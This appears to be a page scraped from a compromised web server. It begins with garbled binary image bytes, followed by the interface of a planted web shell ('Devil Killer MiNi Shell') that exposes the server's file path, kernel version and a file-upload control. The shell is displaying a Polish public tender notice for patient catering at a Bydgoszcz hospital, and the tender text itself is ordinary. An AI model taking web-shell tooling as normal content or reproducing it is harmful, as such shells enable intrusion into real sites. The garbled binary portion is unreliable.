JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210507/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210507/0004894601-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00048946 z dnia 2021-05-07</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług w zakresie całodobowego żywienia pacjentów hospitalizowanych w Wielospecjalistycznym Szpitalu Miejskim im. dr. E.Warmińskiego w Bydgoszczy </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">WIELOSPECJALISTYCZNY SZPITAL MIEJSKI IM.DR EMILA WARMIŃSKIEGO - SPZOZ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 092354746</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Szpitalna 19</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bydgoszcz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">85-826</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">052 37 09 124</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@szpital.bydgoszcz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.szpital.bydgoszcz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług w zakresie całodobowego żywienia pacjentów hospitalizowanych w Wielospecjalistycznym Szpitalu Miejskim im. dr. E.Warmińskiego w Bydgoszczy </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-413fe3e8-af2c-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00048946</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://e-propublico.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://e-propublico.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Wniniejszym postępowaniu komunikacja Zamawiającego z Wykonawcami odbywa sięprzyużyciuśrodków komunikacji elektronicznej, za pośrednictwem Platformy on-line działającejpodadresemhttps://e-propublico.pl.2. Do złożenia oferty konieczne jest posiadanie przezosobęupoważnioną doreprezentowania Wykonawcy ważnego kwalifikowanego podpisuelektronicznego,podpisu zaufanegolub podpisu osobistego.3. Ilekroć w niniejszej SWZ jest mowa o:a)podpisiezaufanym – należy przez torozumieć podpis, o którym mowa art. 3 pkt 14a ustawy z 17 lutego2005 r. oinformatyzacji działalnościpodmiotów realizujących zadania publiczne (t.j Dz.U.2020 poz.346);b)podpisie osobistym – należyprzez to rozumieć podpis, o którym mowa w art. z art. 2 ust. 1 pkt 9ustawyz 6 sierpnia 2010 r. odowodach osobistych (t.j Dz.U.2020 poz. 332).4. ZaleceniaZamawiającegoodnośnie kwalifikowanegopodpisu elektronicznego:a) dokumenty sporządzone iprzesyłane w formacie.pdf zaleca siępodpisywać kwalifikowanym podpisem elektronicznym w formaciePAdES;b) dokumentysporządzone iprzesyłane w formacie innym niż .pdf (np.: .doc, .docx, .xlsx, .xml)zaleca siępodpisywaćkwalifikowanym podpisem elektronicznym w formacie XAdES;c) doskładaniakwalifikowanego podpisuelektronicznego zaleca się stosowanie algorytmu SHA-2 (lubwyższego).5.Zamawiający określanastępujące wymagania sprzętowo – aplikacyjne pozwalające nakorzystanie zPlatformy:a) stałydostęp do sieci Internet;b) posiadanie dowolnej i aktywnej skrzynkipocztyelektronicznej (e-mail),c)komputer z zainstalowanym systemem operacyjnym Windows 7(lubnowszym) albo Linux,d)zainstalowana dowolna przeglądarka internetowa - Platforma współpracujeznajnowszymi, stabilnymiwersjami wszystkich głównych przeglądarek internetowych (InternetExplorer10+, Microsoft Edge,Mozilla Firefox, Google Chrome, Opera),e) włączona obsługa JavaScriptorazCookies6. Zamawiającydopuszcza następujący format przesyłanych danych: pliki o wielkości do20MB w formatach: .pdf,.doc, .docx., .xlsx, .xml.7. Zamawiający określa następujące informacje natematkodowania i czasuodbioru danych:a) załączony i przesłany przez Wykonawcę za pomocąPlatformyplik oferty wraz zzałącznikami, nie jest dostępny dla Zamawiającego i przechowywany jestnaserwerach Platformy wformie zaszyfrowanej. Zamawiający otrzyma dostęp do pliku dopiero poupływieterminu otwarciaofert;b) oznaczenie czasu odbioru danych przez Platformę stanowiprzyporządkowanądo dokumentuelektronicznego datę oraz dokładny czas (hh:mm:ss), widoczne przywysłanymdokumencie wkolumnie ”Data przesłania”;c) o terminie przesłania decyduje czas pełnegoprzeprocesowaniatransakcji pliku na Platformie.8. W postępowaniu, wszelkie oświadczenia,wnioski,zawiadomienia orazinformacje przekazywane są za pośrednictwem Platformy (karta”Wiadomości”). Zadatę wpływuoświadczeń, wniosków, zawiadomień oraz informacji przesłanych zapośrednictwemPlatformy,Ogłoszenie nr 2021/BZP 00013850/01 z dnia 2021-03-052021-03-05 BiuletynZamówieńPublicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowymnapodstawie: art. 275 pkt 1 ustawy - Dostawy przyjmuje się datę ich zamieszczenia naPlatformie.9.Ofertę, wraz ze stanowiącymi jej integralnączęść załącznikami, składa się pod rygoremnieważności wformie elektronicznej lub postacielektronicznej za pośrednictwem Platformy, podpisanąkwalifikowanympodpisem elektronicznym,podpisem zaufanym lub podpisem osobistym.10.Postępowanie o udzieleniezamówienia prowadzi sięw języku polskim. Dokumenty sporządzone wjęzyku obcym są składane wrazz tłumaczeniem najęzyk polski.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zamawiający oświadcza, że spełnia wymogiokreślonewrozporządzeniu Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r.wsprawieochrony osób fizycznych w związku z przetwarzaniem danych osobowych i wsprawieswobodnegoprzepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólnerozporządzenie oochroniedanych) (Dz.Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, tym samym daneosobowe podaneprzezWykonawcę będą przetwarzane zgodnie z RODO oraz zgodnie zprzepisamikrajowymi.2.Zamawiający informuje, że:1) administratorem danych osobowychWykonawcyjestWielospecjalistyczny Szpital Miejski im. dr. Emila Warmińskiego SPZOZ, Szpitalna 19 ,85-826Bydgoszcz.Tel.: 52 3709124, e-mail: zp@szpital.bydgoszcz.pl2) w sprawachzwiązanychzprzetwarzaniem danych osobowych, można kontaktować się z Inspektorem OchronyDanych,którymjest Jarosław Kwiatkowski, za pośrednictwem telefonu 52 370-91-33 lub adresuemail:iod@szpital.bydgoszcz.pl;3) dane osobowe Wykonawcy będą przetwarzane wceluprzeprowadzeniapostępowania o udzielenie zamówienia publicznego pn. Sukcesywnedostawyproduktów do żywieniapozajelitowego – znak sprawy: DZP-270-7-2021 oraz w celuarchiwizacjidokumentacji dotyczącej tegopostępowania;4) odbiorcami przekazanych przez Wykonawcędanychosobowych będą osoby lubpodmioty, którym zostanie udostępniona dokumentacjapostępowania woparciu o art. 18 oraz art. 74ust. 1 ustawy Pzp;5) dane osobowe Wykonawcy będąprzechowywane,zgodnie z art. 78 ustawy Pzp,przez okres 4 lat od dnia zakończenia postępowania oudzieleniezamówienia, a jeżeli okresobowiązywania umowy w sprawie zamówienia publicznegoprzekracza 4lata, okres przechowywaniaobejmuje cały okres obowiązywania umowy.3. Wykonawcajestzobowiązany, w związku z udziałem wprzedmiotowym postępowaniu, do wypełnieniawszystkichobowiązków formalno-prawnychwymaganych przez RODO i związanych z udziałem wprzedmiotowympostępowaniu o udzieleniezamówienia. Do obowiązków tych należą:1) obowiązekinformacyjnyprzewidziany w art. 13 RODOwzględem osób fizycznych, których dane osobowe dotyczą iod którychdane te Wykonawcabezpośrednio pozyskał i przekazał Zamawiającemu w treści ofertylubdokumentów składanych nażądanie Zamawiającego;2) obowiązek informacyjny wynikający z art.14RODO względem osóbfizycznych, których dane Wykonawca pozyskał w sposób pośredni, a któretodane Wykonawcaprzekazuje Zamawiającemu w treści oferty lub dokumentów składanych nażądanieZamawiającego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1.Zamawiający informuje, że:1) udostępnia daneosobowe,októrych mowa w art. 10 RODO (dane osobowe dotyczące wyroków skazujących iczynówzabronionych)w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa wdzialeIX ustawy Pzp,do upływu terminu na ich wniesienie;2) udostępnianie protokołu i załącznikówdoprotokołu mazastosowanie do wszystkich danych osobowych, z wyjątkiem tych, o których mowa wart.9 ust. 1 RODO(tj. danych osobowych ujawniających pochodzenie rasowe lub etniczne,poglądypolityczne, przekonaniareligijne lub światopoglądowe, przynależność do związkówzawodowych orazprzetwarzania danychgenetycznych, danych biometrycznych w celujednoznacznego zidentyfikowaniaosoby fizycznej lubdanych dotyczących zdrowia, seksualności luborientacji seksualnej tej osoby),zebranych w tokupostępowania o udzielenie zamówienia;3) wprzypadku korzystania przez osobę,której dane osobowesą przetwarzane przez Zamawiającego, zuprawnienia, o którym mowa w art. 15ust. 1–3 RODO(związanych z prawem Wykonawcy douzyskania od administratora potwierdzenia, czyprzetwarzane sądane osobowe jego dotyczące,prawem Wykonawcy do bycia poinformowanym oodpowiednichzabezpieczeniach, o których mowa wart. 46 RODO, związanych z przekazaniem jegodanychosobowych do państwa trzeciego luborganizacji międzynarodowej oraz prawem otrzymaniaprzezWykonawcę od administratora kopiidanych osobowych podlegających przetwarzaniu),Zamawiającymoże żądać od osoby występującej zżądaniem wskazania dodatkowych informacji,mających na celusprecyzowanie nazwy lub datyzakończonego postępowania o udzieleniezamówienia;4) skorzystanieprzez osobę, której daneosobowe są przetwarzane, z uprawnienia, októrym mowa w art. 16 RODO(uprawnienie dosprostowania lub uzupełnienia danych osobowych), niemoże naruszać integralnościprotokołupostępowania oraz jego załączników;5) w postępowaniu oudzielenie zamówienia zgłoszenieżądaniaograniczenia przetwarzania, o którym mowa w art. 18 ust. 1RODO, nie ograniczaprzetwarzaniadanych osobowych do czasu zakończenia tego postępowania;6) wprzypadku, gdywniesienie żądaniadotyczącego prawa, o którym mowa w art. 18 ust. 1 RODOspowoduje ograniczenieprzetwarzaniadanych osobowych zawartych w protokole postępowania lubzałącznikach do tegoprotokołu, od dniazakończenia postępowania o udzielenie zamówieniaZamawiający nie udostępniatych danych, chybaże zachodzą przesłanki, o których mowa w art. 18 ust.2 rozporządzenia 2016/679.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DZP-270-18/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Świadczenie usług w zakresie całodobowego żywienia pacjentów hospitalizowanych wWielospecjalistycznym Szpitalu Miejskim im. dr. E. Warmińskiego w Bydgoszczy </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55000000-0 - Usługi hotelarskie, restauracyjne i handlu detalicznego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55321000-6 - Usługi przygotowywania posiłków</p> <p class="mb-0">55322000-3 - Usługi gotowania posiłków</p> <p class="mb-0">55521200-0 - Usługi dowożenia posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1 Sytuacja ekonomiczna lub finansowaO udzielenie zamówienia publicznego mogą ubiegać sięwykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej lub finansowej. Ocenaspełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/niespełnia.Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada ważną iopłaconą polisę OC w zakresie prowadzonej działalności związanej z przedmiotem zamówieniana kwotę minimum 1.000.000,00 zł.2 Zdolność techniczna lub zawodowaO udzieleniezamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczącezdolności technicznej lub zawodowej. Ocena spełniania warunków udziału w postępowaniubędzie dokonana na zasadzie spełnia/nie spełnia.1. w okresie ostatnich 3 lat przed upływemterminu składania ofert wykonał należycie usługę polegającą na przygotowaniu posiłków wramach umowy zbiorowego żywienia, w tym szpitalnego, o wartości minimum 1.200.000,00 złbruttooraz2. dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia,które skieruje do realizacji zamówienia, w tym co najmniej:a) 1 dietetykiem posiadającymwykształcenie wyższe na kierunku dietetyka, żywienie człowieka lub pokrewnym oraz conajmniej 2 lata doświadczenia w zawodzieorazb) 2 kucharzami posiadającymi wykształcenie oprofilu związanym z gastronomią oraz co najmniej 2 lata doświadczenia w żywieniuzbiorowymoraz3. dysponuje lub będzie dysponował :a) kuchnią - miejscem wytwarzaniagotowych posiłków - spełniającą wymogi sanitarne stawiane przepisami prawab) urządzeniami inarzędziami niezbędnymi do wykonania zamówienia, w tym wózkami do transportu posiłków,urządzeniami do dezynfekcji naczyń wielorazowych (jeśli dotyczy)c) środkiem transportuposiadającym pozytywną opinię sanitarną Państwowego Inspektora Sanitarno -Epidemiologicznego3 Zdolność do występowania w obrocie gospodarczymO udzieleniezamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniają warunki, dotycząceposiadania zdolności do występowania w obrocie gospodarczym. Ocena spełniania warunkówudziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.4 Uprawnienia doprowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnychprzepisówO udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniająwarunki, dotyczące posiadania uprawnień do prowadzenia określonej działalności gospodarczejlub zawodowej, o ile wynika to z odrębnych przepisów. Ocena spełniania warunków udziału wpostępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że na dzień składania ofert posiada aktualnezaświadczenie o wpisie do rejestru zakładów podlegających urzędowej kontroli organówPaństwowej Inspekcji Sanitarnej, o których mowa w art.61-67 Ustawy z dnia z dnia 25 sierpnia2006 r. o bezpieczeństwie żywności i żywienia (Dz. U 2020 r., poz. 2021) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykaz osóbWykaz osób, skierowanych przez wykonawcę do realizacjizamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lubkierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych,uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, atakże zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymiosobami.Wykaz dostaw lub usługWykaz dostaw lub usług wykonanych, a w przypadku świadczeńpowtarzających się lub ciągłych również wykonywanych, w okresie ostatnich trzech lat , a jeżeli okresprowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, datwykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane,oraz załączeniem dowodów określających czy te dostawy lub usługi zostały wykonane lub sąwykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumentysporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadkuświadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczynniezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy. Wprzypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź innedokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3miesięcy. Jeżeli Wykonawca powołuje się na doświadczenie w realizacji dostaw lub usług,wykonywanych wspólnie z innymi wykonawcami, wykaz dotyczy dostaw lub usług, w którychwykonaniu Wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających sięlub ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy.Zezwolenie, licencja,koncesja lub wpis do rejestruAktualne zaświadczenie o wpisie Wykonawcy do rejestru zakładówpodlegających urzędowej kontroli organów Państwowej Inspekcji Sanitarnej, o których mowa w art. 61-67 Ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U 2020 r., poz.2021)Ubezpieczenie od odpowiedzialności cywilnejDokument potwierdzający, że Wykonawca jestubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej zprzedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia.Dokumenty luboświadczenia odnośnie bezpieczeństwa informacji lub dostaw1. Decyzja PPIS w sprawie zatwierdzeniazakładu prowadzącego działalność związaną z produkcją i obrotem żywnością w zakresieprzygotowania posiłków od surowca do gotowej potrawy.2. Aktualny dokument potwierdzającyposiadania pozytywnej opinii właściwej terenowo dla Wykonawcy stacji sanitarno - epidemiologicznejdotyczącej środka transportu wykorzystywanego przez Wykonawcę do przewożenia posiłków</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie wykonawcy w sprawie grupy kapitałowejOświadczenie Wykonawcy, w zakresie art. 108ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy zdnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), zinnym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie doudziału w postępowaniu, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz zdokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku odopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samejgrupy kapitałowej.Informacja z Krajowego Rejestru KarnegoInformacja z Krajowego Rejestru Karnegow zakresie art. 108 ust. 1 